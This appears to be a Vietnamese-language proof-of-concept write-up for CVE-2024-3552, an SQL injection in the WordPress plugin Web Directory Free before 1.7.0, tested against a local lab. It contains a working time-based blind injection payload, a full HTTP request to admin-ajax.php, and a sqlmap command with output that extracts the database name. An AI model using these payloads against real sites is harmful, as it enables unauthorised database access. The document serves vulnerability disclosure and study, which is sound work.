# Mô tả

Plugin Web Directory Free (WordPress) trước phiên bản 1.7.0 chứa lỗ hổng SQL Injection. Hàm thực thi AJAX không được lọc/sanitise đầy đủ, cho phép kẻ tấn công vô hiệu hoá truy vấn SQL hoặc tiêm thêm mệnh đề (UNION, time-based, error-based)

# Ngữ cảnh

- Wordpress version 5.8
- Plugin web-directory-free version 1.6.9
- MySQL version 5.7

# Source code
<img width="1201" height="675" alt="image" src="https://github.com/user-attachments/assets/01ba59cf-15f5-4535-8c57-6483acbce691" />


Ở file ajax-controller.php → class w2dc_ajax_controller → Hàm get_map_marker_info

1. Nhận input trực tiếp từ người dùng thông qua giá trị từ `$_POST['locations_ids']` mà không validate
2. Không escape hoặc prepare input `$locations_ids = w2dc_getValue($_POST, 'locations_ids');`
3. Ghép trực tiếp vào câu truy vấn SQL. Với $location_id là từng phần tử trong `$_POST['locations_ids']` thông qua vòng lập foreach

```bash
$row = $wpdb->get_row("SELECT * FROM {$wpdb->w2dc_locations_relationships} WHERE id=".$location_id, ARRAY_A);
```

⇒ SQL injection xảy ra

# Demo

Sử dụng payload =`action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0)) AS a)`

Request: 

```bash
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Length: 110
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/wp-admin/
Accept-Encoding: gzip, deflate, br

action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 1 FROM (SELECT IF(1=1,SLEEP(5),0)) AS a)
```

1. Khi sử dụng payload với điều kiện đúng ⇒ tức IF(1=1, …) ⇒ Delay 5s


<img width="1283" height="514" alt="image (1)" src="https://github.com/user-attachments/assets/f0539ec4-37d7-4baa-ae63-155eecf514ca" />


2. Khi sử dụng payload với điều kiện sai ⇒ tức IF(1=2, …) ⇒ Không có delay

<img width="1275" height="512" alt="image (2)" src="https://github.com/user-attachments/assets/6f0ca741-27c7-407e-9cac-60251c709e8d" />


Kết luận: 

- Khi sử dụng payload với điều kiện đúng thì máy chủ trả về với thời gian khoản 6s ⇒ đã thực hiện SLEEP(5)
- Khi sử dụng payload với điều kiện sai thì máy chủ trả về kết quả với thời gian khoảng 1s ⇒ không thực hiện SLEEP(5)

⇒ Đã thực hiện các truy vẫn được injection ⇒ Khai thác thành công

# Sử dụng sqlmap để scan

```bash
kp@ubuntu:~/Desktop/cve-2024-3552$ sqlmap -u "http://localhost:8080/wp-admin/admin-ajax.php" \
>   --data="action=w2dc_get_map_marker_info&locations_ids[]=1" \
>   -p "locations_ids[]" \
>   --batch --current-db --threads=5
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:59:23 /2025-07-22/

[00:59:24] [INFO] testing connection to the target URL
[00:59:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:59:24] [INFO] testing if the target URL content is stable
[00:59:24] [INFO] target URL content is stable
[00:59:24] [WARNING] heuristic (basic) test shows that POST parameter 'locations_ids[]' might not be injectable
[00:59:24] [INFO] testing for SQL injection on POST parameter 'locations_ids[]'
[00:59:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:59:25] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:59:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:59:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:59:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:59:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:59:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[00:59:27] [INFO] testing 'Generic inline queries'
[00:59:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:59:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:59:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:59:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:59:38] [INFO] POST parameter 'locations_ids[]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:59:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:59:38] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:59:40] [INFO] checking if the injection point on POST parameter 'locations_ids[]' is a false positive
POST parameter 'locations_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: locations_ids[] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 7278 FROM (SELECT(SLEEP(5)))tyoO)
---
[00:59:55] [INFO] the back-end DBMS is MySQL
[00:59:55] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
back-end DBMS: MySQL >= 5.0.12
[00:59:56] [INFO] fetching current database
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[00:59:56] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[01:00:11] [INFO] adjusting time delay to 1 second due to good response times
wp_db
current database: 'wp_db'
[01:00:34] [INFO] fetched data logged to text files under '/home/kp/.sqlmap/output/localhost'
[01:00:34] [WARNING] you haven't updated sqlmap for more than 1936 days!!!

[*] ending @ 01:00:34 /2025-07-22/
```

Thu được Payload = `action=w2dc_get_map_marker_info&locations_ids[]=1 AND (SELECT 7278 FROM (SELECT(SLEEP(5)))tyoO)` ⇒ Có lỗ hổng SQLi

# Github

https://github.com/KiPhuong/cve-2024-3552.git
